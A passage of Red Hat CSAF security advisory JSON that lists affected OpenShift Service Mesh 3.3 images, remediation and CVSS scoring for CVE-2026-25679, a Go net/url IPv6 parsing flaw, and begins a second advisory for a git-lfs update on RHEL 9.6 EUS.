3.3:registry.redhat.io/openshift-service-mesh/istio-rhel9-operator@sha256:31ca725cb3bae79e207987ced13f766439568ddddf856c88801405d61ba51b36_amd64", "Red Hat OpenShift Service Mesh 3.3:registry.redhat.io/openshift-service-mesh/istio-rhel9-operator@sha256:3ba40d26d74d69dd664c0375ae3c170e738bf1943e9e3c550b3c969cbe1ff523_ppc64le", "Red Hat OpenShift Service Mesh 3.3:registry.redhat.io/openshift-service-mesh/istio-rhel9-operator@sha256:8ee83e270eb2a215aef80e6b72dac3d4417726e5f60f2f47d3fa1a0bffb12e4b_s390x", "Red Hat OpenShift Service Mesh 3.3:registry.redhat.io/openshift-service-mesh/istio-rhel9-operator@sha256:de3bf8bcab126df742192a3ed319aa595b3022c036391134ca4149ef711fa4f8_arm64"], "known_not_affected": ["Red Hat OpenShift Service Mesh 3.3:registry.redhat.io/openshift-service-mesh/istio-must-gather-rhel9@sha256:03df0ef1d06c34565f90c87fb0cb05fc5fd0938df5cb696f43d8f86e065b0ac4_s390x", "Red Hat OpenShift Service Mesh 3.3:registry.redhat.io/openshift-service-mesh/istio-must-gather-rhel9@sha256:2e460362e4f7ffa961cb5da2b80a94c88e99d36da97e6e14c944d306b4d707f8_amd64", "Red Hat OpenShift Service Mesh 3.3:registry.redhat.io/openshift-service-mesh/istio-must-gather-rhel9@sha256:5dd40f7513ab3dfa96f1fee418cfdc9fc4b49dfa845963494cf61b9d8997d35b_arm64", "Red Hat OpenShift Service Mesh 3.3:registry.redhat.io/openshift-service-mesh/istio-must-gather-rhel9@sha256:d3211fd66831bc105da8a0d004c2fc48e09d867f705e6de1ff061e935298ea7a_ppc64le", "Red Hat OpenShift Service Mesh 3.3:registry.redhat.io/openshift-service-mesh/istio-sail-operator-bundle@sha256:7c721b3e96083fffbede7c3e313b9a2609dd620086d8c3a6c92faa06eb78306b_amd64", "Red Hat OpenShift Service Mesh 3.3:registry.redhat.io/openshift-service-mesh/istio-ztunnel-rhel9@sha256:14069f839fc0ee972d8711f859af831f8ad268208dad8741f0397749982ccb4c_ppc64le", "Red Hat OpenShift Service Mesh 3.3:registry.redhat.io/openshift-service-mesh/istio-ztunnel-rhel9@sha256:35692553d65a7d62c96969e109a2a987fb1ccbe863d1f74097a00816dce86e2f_s390x", "Red Hat OpenShift Service Mesh 3.3:registry.redhat.io/openshift-service-mesh/istio-ztunnel-rhel9@sha256:58a3cb5bc211964eae0e1139ec77d8242d01d81565dc2fba3f164abc2a64a108_amd64", "Red Hat OpenShift Service Mesh 3.3:registry.redhat.io/openshift-service-mesh/istio-ztunnel-rhel9@sha256:8705c16d6828a53bd799590ddceb685f3678c6779f121a5c916aa9ecf622baf7_arm64"]}, "references": [{"category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2026-25679"}, {"category": "external", "summary": "RHBZ#2445356", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2445356"}, {"category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2026-25679", "url": "https://www.cve.org/CVERecord?id=CVE-2026-25679"}, {"category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-25679", "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25679"}, {"category": "external", "summary": "https://go.dev/cl/752180", "url": "https://go.dev/cl/752180"}, {"category": "external", "summary": "https://go.dev/issue/77578", "url": "https://go.dev/issue/77578"}, {"category": "external", "summary": "https://groups.google.com/g/golang-announce/c/EdhZqrQ98hk", "url": "https://groups.google.com/g/golang-announce/c/EdhZqrQ98hk"}, {"category": "external", "summary": "https://pkg.go.dev/vuln/GO-2026-4601", "url": "https://pkg.go.dev/vuln/GO-2026-4601"}], "release_date": "2026-03-06T21:28:14.211000+00:00", "remediations": [{"category": "vendor_fix", "date": "2026-04-21T17:38:07+00:00", "details": "See Red Hat OpenShift Service Mesh 3.3.2 documentation at https://docs.redhat.com/en/documentation/red_hat_openshift_service_mesh/3.3", "product_ids": ["Red Hat OpenShift Service Mesh 3.3:registry.redhat.io/openshift-service-mesh/istio-cni-rhel9@sha256:4aa8fcf79e1ce68c7d34926263ff9ae52c29877554a4c3de93d8ac02b0988af6_ppc64le", "Red Hat OpenShift Service Mesh 3.3:registry.redhat.io/openshift-service-mesh/istio-cni-rhel9@sha256:502d8f43bf950f39495738a03048c46efbe5790c6eddec7fc0e1f7d3cf016922_s390x", "Red Hat OpenShift Service Mesh 3.3:registry.redhat.io/openshift-service-mesh/istio-cni-rhel9@sha256:96df77ab3e0cd987687782fbcd175d491f589189e01d68fef8cfed37ae240e48_amd64", "Red Hat OpenShift Service Mesh 3.3:registry.redhat.io/openshift-service-mesh/istio-cni-rhel9@sha256:f420d1d2f9b79a62b228035108608f0d4f7366d2d1406bd0411be658af2ea909_arm64", "Red Hat OpenShift Service Mesh 3.3:registry.redhat.io/openshift-service-mesh/istio-pilot-rhel9@sha256:0c7b68a6a861cdc41e7bb775082158c9f6ee7bddee9b74eefb20893757d987ef_arm64", "Red Hat OpenShift Service Mesh 3.3:registry.redhat.io/openshift-service-mesh/istio-pilot-rhel9@sha256:b563447995234c60a4047a1b4df572048456b5220b516f3dab1cac1acfb3625f_amd64", "Red Hat OpenShift Service Mesh 3.3:registry.redhat.io/openshift-service-mesh/istio-pilot-rhel9@sha256:cbe68a0b4b31a36221365d817f8a58372136c1f8821605435b33948e71241502_ppc64le", "Red Hat OpenShift Service Mesh 3.3:registry.redhat.io/openshift-service-mesh/istio-pilot-rhel9@sha256:e7ae23e4c782b7634acbbb9593cf383840094d06b651cbfc9e93faf8f9ced1e2_s390x", "Red Hat OpenShift Service Mesh 3.3:registry.redhat.io/openshift-service-mesh/istio-proxyv2-rhel9@sha256:654fe336492b1ffc23570610b598c93fcd37dca9892ea9156e3c57576041f87a_ppc64le", "Red Hat OpenShift Service Mesh 3.3:registry.redhat.io/openshift-service-mesh/istio-proxyv2-rhel9@sha256:7111cdde23558876b6846e9a60cff6609b716d0f69b42625c6e4e94faad6554c_arm64", "Red Hat OpenShift Service Mesh 3.3:registry.redhat.io/openshift-service-mesh/istio-proxyv2-rhel9@sha256:a56b0d2625c0c74330619e1ad9c3eb9ffb950e7e159f1f30d1d13662174442bb_amd64", "Red Hat OpenShift Service Mesh 3.3:registry.redhat.io/openshift-service-mesh/istio-proxyv2-rhel9@sha256:f45f7a1ddd1359010cc6dae2c03ce5ca9674c17c313470acb13094bf41bc19e9_s390x", "Red Hat OpenShift Service Mesh 3.3:registry.redhat.io/openshift-service-mesh/istio-rhel9-operator@sha256:31ca725cb3bae79e207987ced13f766439568ddddf856c88801405d61ba51b36_amd64", "Red Hat OpenShift Service Mesh 3.3:registry.redhat.io/openshift-service-mesh/istio-rhel9-operator@sha256:3ba40d26d74d69dd664c0375ae3c170e738bf1943e9e3c550b3c969cbe1ff523_ppc64le", "Red Hat OpenShift Service Mesh 3.3:registry.redhat.io/openshift-service-mesh/istio-rhel9-operator@sha256:8ee83e270eb2a215aef80e6b72dac3d4417726e5f60f2f47d3fa1a0bffb12e4b_s390x", "Red Hat OpenShift Service Mesh 3.3:registry.redhat.io/openshift-service-mesh/istio-rhel9-operator@sha256:de3bf8bcab126df742192a3ed319aa595b3022c036391134ca4149ef711fa4f8_arm64"], "restart_required": {"category": "none"}, "url": "https://access.redhat.com/errata/RHSA-2026:9461"}, {"category": "workaround", "details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.", "product_ids": ["Red Hat OpenShift Service Mesh 3.3:registry.redhat.io/openshift-service-mesh/istio-cni-rhel9@sha256:4aa8fcf79e1ce68c7d34926263ff9ae52c29877554a4c3de93d8ac02b0988af6_ppc64le", "Red Hat OpenShift Service Mesh 3.3:registry.redhat.io/openshift-service-mesh/istio-cni-rhel9@sha256:502d8f43bf950f39495738a03048c46efbe5790c6eddec7fc0e1f7d3cf016922_s390x", "Red Hat OpenShift Service Mesh 3.3:registry.redhat.io/openshift-service-mesh/istio-cni-rhel9@sha256:96df77ab3e0cd987687782fbcd175d491f589189e01d68fef8cfed37ae240e48_amd64", "Red Hat OpenShift Service Mesh 3.3:registry.redhat.io/openshift-service-mesh/istio-cni-rhel9@sha256:f420d1d2f9b79a62b228035108608f0d4f7366d2d1406bd0411be658af2ea909_arm64", "Red Hat OpenShift Service Mesh 3.3:registry.redhat.io/openshift-service-mesh/istio-must-gather-rhel9@sha256:03df0ef1d06c34565f90c87fb0cb05fc5fd0938df5cb696f43d8f86e065b0ac4_s390x", "Red Hat OpenShift Service Mesh 3.3:registry.redhat.io/openshift-service-mesh/istio-must-gather-rhel9@sha256:2e460362e4f7ffa961cb5da2b80a94c88e99d36da97e6e14c944d306b4d707f8_amd64", "Red Hat OpenShift Service Mesh 3.3:registry.redhat.io/openshift-service-mesh/istio-must-gather-rhel9@sha256:5dd40f7513ab3dfa96f1fee418cfdc9fc4b49dfa845963494cf61b9d8997d35b_arm64", "Red Hat OpenShift Service Mesh 3.3:registry.redhat.io/openshift-service-mesh/istio-must-gather-rhel9@sha256:d3211fd66831bc105da8a0d004c2fc48e09d867f705e6de1ff061e935298ea7a_ppc64le", "Red Hat OpenShift Service Mesh 3.3:registry.redhat.io/openshift-service-mesh/istio-pilot-rhel9@sha256:0c7b68a6a861cdc41e7bb775082158c9f6ee7bddee9b74eefb20893757d987ef_arm64", "Red Hat OpenShift Service Mesh 3.3:registry.redhat.io/openshift-service-mesh/istio-pilot-rhel9@sha256:b563447995234c60a4047a1b4df572048456b5220b516f3dab1cac1acfb3625f_amd64", "Red Hat OpenShift Service Mesh 3.3:registry.redhat.io/openshift-service-mesh/istio-pilot-rhel9@sha256:cbe68a0b4b31a36221365d817f8a58372136c1f8821605435b33948e71241502_ppc64le", "Red Hat OpenShift Service Mesh 3.3:registry.redhat.io/openshift-service-mesh/istio-pilot-rhel9@sha256:e7ae23e4c782b7634acbbb9593cf383840094d06b651cbfc9e93faf8f9ced1e2_s390x", "Red Hat OpenShift Service Mesh 3.3:registry.redhat.io/openshift-service-mesh/istio-proxyv2-rhel9@sha256:654fe336492b1ffc23570610b598c93fcd37dca9892ea9156e3c57576041f87a_ppc64le", "Red Hat OpenShift Service Mesh 3.3:registry.redhat.io/openshift-service-mesh/istio-proxyv2-rhel9@sha256:7111cdde23558876b6846e9a60cff6609b716d0f69b42625c6e4e94faad6554c_arm64", "Red Hat OpenShift Service Mesh 3.3:registry.redhat.io/openshift-service-mesh/istio-proxyv2-rhel9@sha256:a56b0d2625c0c74330619e1ad9c3eb9ffb950e7e159f1f30d1d13662174442bb_amd64", "Red Hat OpenShift Service Mesh 3.3:registry.redhat.io/openshift-service-mesh/istio-proxyv2-rhel9@sha256:f45f7a1ddd1359010cc6dae2c03ce5ca9674c17c313470acb13094bf41bc19e9_s390x", "Red Hat OpenShift Service Mesh 3.3:registry.redhat.io/openshift-service-mesh/istio-rhel9-operator@sha256:31ca725cb3bae79e207987ced13f766439568ddddf856c88801405d61ba51b36_amd64", "Red Hat OpenShift Service Mesh 3.3:registry.redhat.io/openshift-service-mesh/istio-rhel9-operator@sha256:3ba40d26d74d69dd664c0375ae3c170e738bf1943e9e3c550b3c969cbe1ff523_ppc64le", "Red Hat OpenShift Service Mesh 3.3:registry.redhat.io/openshift-service-mesh/istio-rhel9-operator@sha256:8ee83e270eb2a215aef80e6b72dac3d4417726e5f60f2f47d3fa1a0bffb12e4b_s390x", "Red Hat OpenShift Service Mesh 3.3:registry.redhat.io/openshift-service-mesh/istio-rhel9-operator@sha256:de3bf8bcab126df742192a3ed319aa595b3022c036391134ca4149ef711fa4f8_arm64", "Red Hat OpenShift Service Mesh 3.3:registry.redhat.io/openshift-service-mesh/istio-sail-operator-bundle@sha256:7c721b3e96083fffbede7c3e313b9a2609dd620086d8c3a6c92faa06eb78306b_amd64", "Red Hat OpenShift Service Mesh 3.3:registry.redhat.io/openshift-service-mesh/istio-ztunnel-rhel9@sha256:14069f839fc0ee972d8711f859af831f8ad268208dad8741f0397749982ccb4c_ppc64le", "Red Hat OpenShift Service Mesh 3.3:registry.redhat.io/openshift-service-mesh/istio-ztunnel-rhel9@sha256:35692553d65a7d62c96969e109a2a987fb1ccbe863d1f74097a00816dce86e2f_s390x", "Red Hat OpenShift Service Mesh 3.3:registry.redhat.io/openshift-service-mesh/istio-ztunnel-rhel9@sha256:58a3cb5bc211964eae0e1139ec77d8242d01d81565dc2fba3f164abc2a64a108_amd64", "Red Hat OpenShift Service Mesh 3.3:registry.redhat.io/openshift-service-mesh/istio-ztunnel-rhel9@sha256:8705c16d6828a53bd799590ddceb685f3678c6779f121a5c916aa9ecf622baf7_arm64"]}], "scores": [{"cvss_v3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1"}, "products": ["Red Hat OpenShift Service Mesh 3.3:registry.redhat.io/openshift-service-mesh/istio-cni-rhel9@sha256:4aa8fcf79e1ce68c7d34926263ff9ae52c29877554a4c3de93d8ac02b0988af6_ppc64le", "Red Hat OpenShift Service Mesh 3.3:registry.redhat.io/openshift-service-mesh/istio-cni-rhel9@sha256:502d8f43bf950f39495738a03048c46efbe5790c6eddec7fc0e1f7d3cf016922_s390x", "Red Hat OpenShift Service Mesh 3.3:registry.redhat.io/openshift-service-mesh/istio-cni-rhel9@sha256:96df77ab3e0cd987687782fbcd175d491f589189e01d68fef8cfed37ae240e48_amd64", "Red Hat OpenShift Service Mesh 3.3:registry.redhat.io/openshift-service-mesh/istio-cni-rhel9@sha256:f420d1d2f9b79a62b228035108608f0d4f7366d2d1406bd0411be658af2ea909_arm64", "Red Hat OpenShift Service Mesh 3.3:registry.redhat.io/openshift-service-mesh/istio-must-gather-rhel9@sha256:03df0ef1d06c34565f90c87fb0cb05fc5fd0938df5cb696f43d8f86e065b0ac4_s390x", "Red Hat OpenShift Service Mesh 3.3:registry.redhat.io/openshift-service-mesh/istio-must-gather-rhel9@sha256:2e460362e4f7ffa961cb5da2b80a94c88e99d36da97e6e14c944d306b4d707f8_amd64", "Red Hat OpenShift Service Mesh 3.3:registry.redhat.io/openshift-service-mesh/istio-must-gather-rhel9@sha256:5dd40f7513ab3dfa96f1fee418cfdc9fc4b49dfa845963494cf61b9d8997d35b_arm64", "Red Hat OpenShift Service Mesh 3.3:registry.redhat.io/openshift-service-mesh/istio-must-gather-rhel9@sha256:d3211fd66831bc105da8a0d004c2fc48e09d867f705e6de1ff061e935298ea7a_ppc64le", "Red Hat OpenShift Service Mesh 3.3:registry.redhat.io/openshift-service-mesh/istio-pilot-rhel9@sha256:0c7b68a6a861cdc41e7bb775082158c9f6ee7bddee9b74eefb20893757d987ef_arm64", "Red Hat OpenShift Service Mesh 3.3:registry.redhat.io/openshift-service-mesh/istio-pilot-rhel9@sha256:b563447995234c60a4047a1b4df572048456b5220b516f3dab1cac1acfb3625f_amd64", "Red Hat OpenShift Service Mesh 3.3:registry.redhat.io/openshift-service-mesh/istio-pilot-rhel9@sha256:cbe68a0b4b31a36221365d817f8a58372136c1f8821605435b33948e71241502_ppc64le", "Red Hat OpenShift Service Mesh 3.3:registry.redhat.io/openshift-service-mesh/istio-pilot-rhel9@sha256:e7ae23e4c782b7634acbbb9593cf383840094d06b651cbfc9e93faf8f9ced1e2_s390x", "Red Hat OpenShift Service Mesh 3.3:registry.redhat.io/openshift-service-mesh/istio-proxyv2-rhel9@sha256:654fe336492b1ffc23570610b598c93fcd37dca9892ea9156e3c57576041f87a_ppc64le", "Red Hat OpenShift Service Mesh 3.3:registry.redhat.io/openshift-service-mesh/istio-proxyv2-rhel9@sha256:7111cdde23558876b6846e9a60cff6609b716d0f69b42625c6e4e94faad6554c_arm64", "Red Hat OpenShift Service Mesh 3.3:registry.redhat.io/openshift-service-mesh/istio-proxyv2-rhel9@sha256:a56b0d2625c0c74330619e1ad9c3eb9ffb950e7e159f1f30d1d13662174442bb_amd64", "Red Hat OpenShift Service Mesh 3.3:registry.redhat.io/openshift-service-mesh/istio-proxyv2-rhel9@sha256:f45f7a1ddd1359010cc6dae2c03ce5ca9674c17c313470acb13094bf41bc19e9_s390x", "Red Hat OpenShift Service Mesh 3.3:registry.redhat.io/openshift-service-mesh/istio-rhel9-operator@sha256:31ca725cb3bae79e207987ced13f766439568ddddf856c88801405d61ba51b36_amd64", "Red Hat OpenShift Service Mesh 3.3:registry.redhat.io/openshift-service-mesh/istio-rhel9-operator@sha256:3ba40d26d74d69dd664c0375ae3c170e738bf1943e9e3c550b3c969cbe1ff523_ppc64le", "Red Hat OpenShift Service Mesh 3.3:registry.redhat.io/openshift-service-mesh/istio-rhel9-operator@sha256:8ee83e270eb2a215aef80e6b72dac3d4417726e5f60f2f47d3fa1a0bffb12e4b_s390x", "Red Hat OpenShift Service Mesh 3.3:registry.redhat.io/openshift-service-mesh/istio-rhel9-operator@sha256:de3bf8bcab126df742192a3ed319aa595b3022c036391134ca4149ef711fa4f8_arm64", "Red Hat OpenShift Service Mesh 3.3:registry.redhat.io/openshift-service-mesh/istio-sail-operator-bundle@sha256:7c721b3e96083fffbede7c3e313b9a2609dd620086d8c3a6c92faa06eb78306b_amd64", "Red Hat OpenShift Service Mesh 3.3:registry.redhat.io/openshift-service-mesh/istio-ztunnel-rhel9@sha256:14069f839fc0ee972d8711f859af831f8ad268208dad8741f0397749982ccb4c_ppc64le", "Red Hat OpenShift Service Mesh 3.3:registry.redhat.io/openshift-service-mesh/istio-ztunnel-rhel9@sha256:35692553d65a7d62c96969e109a2a987fb1ccbe863d1f74097a00816dce86e2f_s390x", "Red Hat OpenShift Service Mesh 3.3:registry.redhat.io/openshift-service-mesh/istio-ztunnel-rhel9@sha256:58a3cb5bc211964eae0e1139ec77d8242d01d81565dc2fba3f164abc2a64a108_amd64", "Red Hat OpenShift Service Mesh 3.3:registry.redhat.io/openshift-service-mesh/istio-ztunnel-rhel9@sha256:8705c16d6828a53bd799590ddceb685f3678c6779f121a5c916aa9ecf622baf7_arm64"]}], "threats": [{"category": "impact", "details": "Important"}], "title": "net/url: Incorrect parsing of IPv6 host literals in net/url"}], "containers": {"cna": {"x_gcve": [{"recordType": "advisory", "vulnId": "rhsa-2026:9461"}]}}}, {"document": {"aggregate_severity": {"namespace": "https://access.redhat.com/security/updates/classification/", "text": "Important"}, "category": "csaf_security_advisory", "csaf_version": "2.0", "distribution": {"text": "Copyright \u00a9 Red Hat, Inc. All rights reserved.", "tlp": {"label": "WHITE", "url": "https://www.first.org/tlp/"}}, "lang": "en", "notes": [{"category": "summary", "text": "An update for git-lfs is now available for Red Hat Enterprise Linux 9.6 Extended Update Support.\n\nRed Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.", "title": "Topic"}, {"category": "general", "text": "Git Large File Storage (LFS) replaces large files such as audio samples, videos, datasets, and graphics with text pointers inside Git, while storing the file contents on a remote server.\n\nSecurity Fix(es):\n\n* net/url: Incorrect parsing of IPv6 host literals in net/url (CVE-2026-25679)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "title": "Details"}, {"category": "legal_disclaimer", "text": "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.", "title": "Terms of Use"}], "publisher": {"category": "vendor", "contact_details": "https://access.redhat.com/security/team/contact/", "issuing_authority": "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.", "name": "Red Hat Product Security", "namespace": "https://www.redhat.com"}, "references": [{"category": "self", "summary": "https://access.redhat.com/errata/RHSA-2026:9439", "url": "https://access.redhat.com/errata/RHSA-2026:9439"}, {"category": "external", "summary": "https://access.redhat.com/security/updates/classification/#important", "url": "https://access.redhat.com/security/updates/classification/#important"}, {"category": "external", "summary": "2445356", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2445356"}, {"category": "self", "summary": "Canonical URL", "url": "https://security.access.redhat.com/data/csaf/v2/advisories/2026/rhsa-2026_9439.json"}], "title": "Red Hat Security Advisory: git-lfs security update", "tracking": {"current_release_date": "2026-06-08T15:52:51+00:00", "generator": {"date": "2026-06-08T15:52:51+00:00", "engine": {"name": "Red Hat SDEngine", "version": "4.8.2"}}, "id": "RHSA-2026:9439", "initial_release_date": "2026-04-21T17:53:20+00:00", "revision_history": [{"date": "2026-04-21T17:53:20+00:00", "number": "1", "summary": "Initial version"}, {"date": "2026-04-21T17:53:20+00:00", "number": "2", "summary": "Last updated version"}, {"date": "2026-06-08T15:52:51+00:00", "number": "3", "summary": "Last generated version"}], "status": "final", "version": "3"}}, "product_tree": {"branches": [{"branches": [{"branches": [{"category": "product_name", "name": "Red Hat Enterprise Linux AppStream EUS (v.9.6)", "product": {"name": "Red Hat Enterprise Linux AppStream EUS (v.9.6)", "product_id": "AppStream-9.6.0.Z.EUS", "product_identification_helper": {"cpe": "cpe:/a:redhat:rhel_eus:9.6::appstream"}}}], "category": "product_family", "name": "Red Hat Enterprise Linux"}, {"branches": [{"category": "product_version", "name": "git-lfs-0:3.6.1-2.el9_6.3.src", "product": {"name": "git-lfs-0:3.6.1-2.el9_6.3.src", "product_id": "git-lfs-0:3.6.1-2.el9_6.3.src", "product_identification_helper": {"purl": "pkg:rpm/redhat/git-lfs@3.6.1-2.el9_6.3?arch=src"}}}], "category": "architecture", "name": "src"}, {"branches": [{"category": "product_version", "name": "git-lfs-0:3.6.1-2.el9_6.3.aarch64", "product": {"name": "git-lfs-0:3.6.1-2.el9_6.3.aarch64", "product_id": "git-lfs-0:3.6.1-2.el9_6.3.aarch64", "product_identification_helper": {"purl": "pkg:rpm/redhat/git-lfs@3.6.1-2.el9_6.3?arch=aarch64"}}}, {"category": "product_version", "name": "git-lfs-debugsource-0:3.6.1-2.el9_6.3.aarch64", "product": {"name": "git-lfs-debugsource-0:3.6.1-2.el9_6.3.aarch64", "product_id": "git-lfs-debugsource-0:3.6.1-2.el9_6.3.aarch64", "product_identification_helper": {"purl": "pkg:rpm/redhat/git-lfs-debugsource@3.6.1-2.el9_6.3?arch=aarch64"}}}, {"category": "product_version", "name": "git-lfs-debuginfo-0:3.6.1-2.el9_6.3.aarch64", "product": {"name": "git-lfs-debuginfo-0:3.6.1-2.el9_6.3.aarch64", "product_id": "git-lfs-debuginfo-0:3.6.1-2.el9_6.3.aarch64", "product_identification_helper": {"purl": "pkg:rpm/redhat/git-lfs-debuginfo@3.6.1-2.el9_6.3?arch=aarch64"}}}], "category": "architecture", "name": "aarch64"}, {"branches": [{"category": "product_version", "name": "git-lfs-0:3.6.1-2.el9_6.3.ppc64le", "product": {"name": "git-lfs-0:3.6.1-2.el9_6.3.ppc64le", "product_id": "git-lfs-0:3.6.1-2.el9_6.3.ppc64le", "product_identification_helper": {"purl": "pkg:rpm/redhat/git-lfs@3.6.1-2.el9_6.3?arch=ppc64le"}}}, {"category": "product_version", "name": "git-lfs-debugsource-0:3.6.1-2.el9_6.3.ppc64le", "product": {"name": "git-lfs-debugsource-0:3.6.1-2.el9_6.3.ppc64le", "product_id": "git-lfs-debugsource-0:3.6.1-2.el9_6.3.ppc64le", "product_identification_helper": {"purl": "pkg:rpm/redhat/git-lfs-debugsource@3.6.1-2.el9_6.3?arch=ppc64le"}}}, {"category": "product_version", "name": "git-lfs-debuginfo-0:3.6.1-2.el9_6.3.ppc64le", "product": {"name": "git-lfs-debuginfo-0:3.6.1-2.el9_6.3.ppc64le", "product_id": "git-lfs-debuginfo-0:3.6.1-2.el9_6.3.ppc64le", "product_identification_helper": {"purl": "pkg:rpm/redhat/git-lfs-debuginfo@3.6.1-2.el9_6.3?arch=ppc64le"}}}], "category": "architecture", "name": "ppc64le"}, {"branches": [{"category": "product_version", "name": "git-lfs-0:3.6.1-2.el9_6.3.x86_64", "product": {"name": "git-lfs-0:3.6.1-2.el9_6.3.x86_64", "product_id": "git-lfs-0:3.6.1-2.el9_6.3.x86_64", "product_identification_helper": {"purl": "pkg:rpm/redhat/git-lfs@3.6.1-2.el9_6.3?arch=x86_64"}}}, {"category": "product_version", "name": "git-lfs-debugsource-0:3.6.1-2.el9_6.3.x86_64", "product": {"name": "git-lfs-debugsource-0:3.6.1-2.el9_6.3.x86_64", "product_id": "git-lfs-debugsource-0:3.6.1-2.el9_6.3.x86_64", "product_identification_helper": {"purl": "pkg:rpm/redhat/git-lfs-debugsource@3.6.1-2.el9_6.3?arch=x86_64"}}}, {"category": "product_version", "name": "git-lfs-debuginfo-0:3.6.1-2.el9_6.3.x86_64", "product": {"name": "git-lfs-debuginfo-0:3.6.1-2.el9_6.3.x86_64", "product_id": "git-lfs-debuginfo-0:3.6.1-2.el9_6.3.x86_64", "product_identification_helper": {"purl": "pkg:rpm/redhat/git-lfs-debuginfo@3.6.1-2.el9_6.3?arch=x86_64"}}}], "category": "architecture", "name": "x86_64"}, {"branches": [{"category": "product_version", "name": "git-lfs-0:3.6.1-2.el9_6.3.s390x", "product": {"name": "git-lfs-0:3.6.1-2.el9_6.3.s390x", "product_id": "git-lfs-0:3.6.1-2.el9_6.3.s390x", "product_identification_helper": {"purl": "pkg:rpm/redhat/git-lfs@3.6.1-2.el9_6.3?arch=s390x"}}}, {"category": "product_version", "name": "git-lfs-debugsource-0:3.6.1-2.el9_6.3.s390x", "product": {"name": "git-lfs-debugsource-0:3.6.1-2.el9_6.3.s390x", "product_id": "git-lfs-debugsource-0:3.6.1-2.el9_6.3.s390x", "product_identification_helper": {"purl": "pkg:rpm/redhat/git-lfs-debugsource@3.6.1-2.el9_6.3?arch=s390x"}}}, {"category": "product_version", "name": "git-lfs-debuginfo-0:3.6.1-2.el9_6.3.s390x", "product": {"name": "git-lfs-debuginfo-0:3.6.1-2.el9_6.3.s390x", "product_id": "git-lfs-debuginfo-0:3.6.1-2.el9_6.3.s390x", "product_identification_helper": {"purl": "pkg:rpm/redhat/git-lfs-debuginfo@3.6.1-2.el9_6.3?arch=s390x"}}}], "category": "architecture", "name": "s390x"}], "category": "vendor", "name": "Red Hat"}], "relationships": [{"category": "default_component_of", "full_product_name": {"name": "git-lfs-0:3.6.1-2.el9_6.3.aarch64 as a component of Red Hat Enterprise Linux AppStream EUS (v.9.6)", "product_id": "AppStream-9.6.0.Z.EUS:git-lfs-0:3.6.1-2.el9_6.3.aarch64"}, "product_reference": "git-lfs-0:3.6.1-2.el9_6.3.aarch64", "relates_to_product_reference": "AppStream-9.6.0.Z.EUS"}, {"category": "default_component_of", "full_product_name": {"name": "git-lfs-0:3.6.1-2.el9_6.3.ppc64le as a component of Red Hat Enterprise Linux AppStream EUS (v.9.6)", "product_id": "AppStream-9.6.0.Z.EUS:git-lfs-0:3.6.1-2.el9_6.3.ppc64le"}, "product_reference": "git-lfs-0:3.6.1-2.el9_6.3.ppc64le", "relates_to_product_reference": "AppStream-9.6.0.Z.EUS"}, {"category": "default_component_of", "full_product_name": {"name": "git-lfs-0:3.6.1-2.el9_6.3.s390x as a component of Red Hat Enterprise Linux AppStream EUS (v.9.6)", "product_id": "AppStream-9.6.0.Z.EUS:git-lfs-0:3.6.1-2.el9_6.3.s390x"}, "product_reference": "git-lfs-0:3.6.1-2.el9_6.3.s390x", "relates_to_product_reference": "AppStream-9.6.0.Z.EUS"}, {"category": "default_component_of", "full_product_name": {"name": "git-lfs-0:3.6.1-2.el9_6.3.src as a component of Red Hat Enterprise Linux AppStream EUS (v.9.6)", "product_id": "AppStream-9.6.0.Z.EUS:git-lfs-0:3.6.1-2.el9_6.3.src"}, "product_reference": "git-lfs-0:3.6.1-2.el9_6.3.src", "relates_to_product_reference": "AppStream-9.6.0.Z.EUS"}, {"category": "default_component_of", "full_product_name": {"name": "git-lfs-0:3.6.1-2.el9_6.3.x86_64 as a component of Red Hat Enterprise Linux AppStream EUS (v.9.6)", "product_id": "AppStream-9.6.0.Z.EUS:git-lfs-0:3.6.1-2.el9_6.3.x86_64"}, "product_reference": "git-lfs-0:3.6.1-2.el9_6.3.x86_64", "relates_to_product_reference": "AppStream-9.6.0.Z.EUS"}, {"category": "default_component_of", "full_product_name": {"name": "git-lfs-debuginfo-0:3.6.1-2.el9_6.3.aarch64 as a component of Red Hat Enterprise Linux AppStream EUS (v.9.6)", "product_id": "AppStream-9.6.0.Z.EUS:git-lfs-debuginfo-0:3.6.1-2.el9_6.3.aarch64"}, "product_reference": "git-lfs-debuginfo-0:3.6.1-2.el9_6.3.aarch64", "relates_to_product_reference": "AppStream-9.6.0.Z.EUS"}, {"category": "default_component_of", "full_product_name": {"name": "git-lfs-debuginfo-0:3.6.1-2.el9_6.3.ppc64le as a component of Red Hat Enterprise Linux AppStream EUS (v.9.6)", "product_id": "AppStream-9.6.0.Z.EUS:git-lfs-debuginfo-0:3.6.1-2.el9_6.3.ppc64le"}, "product_reference": "git-lfs-debuginfo-0:3.6.1-2.el9_6.3.ppc64le", "relates_to_product_reference": "AppStream-9.6.0.Z.EUS"}, {"category": "default_component_of", "full_product_name": {"name": "git-lfs-debuginfo-0:3.6.1-2.el9_6.3.s390x as a component of Red Hat Enterprise Linux AppStream EUS (v.9.6)", "product_id": "AppStream-9.6.0.Z.EUS:git-lfs-debuginfo-0:3.6.1-2.el9_6.3.s390x"}, "product_reference": "git-lfs-debuginfo-0:3.6.1-2.el9_6.3.s390x", "relates_to_product_reference": 